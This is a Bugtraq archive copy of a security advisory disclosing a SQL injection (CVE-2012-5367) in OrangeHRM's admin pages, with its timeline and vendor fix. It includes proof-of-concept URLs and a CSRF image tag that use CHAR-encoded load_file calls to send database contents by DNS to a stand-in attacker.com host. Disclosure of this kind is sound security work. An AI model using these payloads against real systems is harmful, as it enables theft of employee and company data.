Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SQL Injection Vulnerability in OrangeHRM

From: advisory () htbridge com
Date: Mon, 5 Nov 2012 15:31:12 +0100 (CET)
Advisory ID: HTB23119
Product: OrangeHRM
Vendor: OrangeHRM Inc.
Vulnerable Version(s): 2.7.1-rc.1 and probably prior
Tested Version: 2.7.1-rc.1
Vendor Notification: October 10, 2012 
Public Disclosure: October 31, 2012 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5367
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in OrangeHRM, which could be exploited to 
alter SQL requests to application's database. 


1) SQL Injection Vulnerability in Orange HRM: CVE-2012-5367

The vulnerability was discovered in the "/symfony/web/index.php" script while handling the "sortField" HTTP GET 
parameter. 

Successful exploitation of this vulnerability requires administrative privileges, however it can be exploited by a 
non-authenticated user via CSRF vector, as the above-mentioned script is also vulnerable to CSRF attack. 

The vulnerability could be triggered by accessing the following URIs:
 
/symfony/web/index.php/admin/viewCustomers
/symfony/web/index.php/admin/viewPayGrades 
/symfony/web/index.php/admin/viewPayGrades


The PoC codes below are based on DNS Exfiltration technique and can be used in cases when application's database is 
hosted on a Windows system. The PoCs will send a DNS request demanding IP addess for `version()` (or any other 
sensitive information from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled 
by the attacker):


1.1 http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select 
load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))


The following PoC demonstrates exploitation of the vulnerability via CSRF vector:


<img src="http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select 
load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">



1.2 http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortField=(select 
load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))

1.3 http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sortField=(select 
load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to OrangeHRM 2.7.1
http://www.orangehrm.com/download.php

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23119 - https://www.htbridge.com/advisory/HTB23119 - SQL Injection Vulnerability in 
Orange HRM.
[2] OrangeHRM - http://www.orangehrm.com - OrangeHRM is the world’s most popular Open Source Human Resource Management 
Software (HRMS) with over 1,000,000 users globally.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
Previous By Date Next
Previous By Thread Next

Current thread: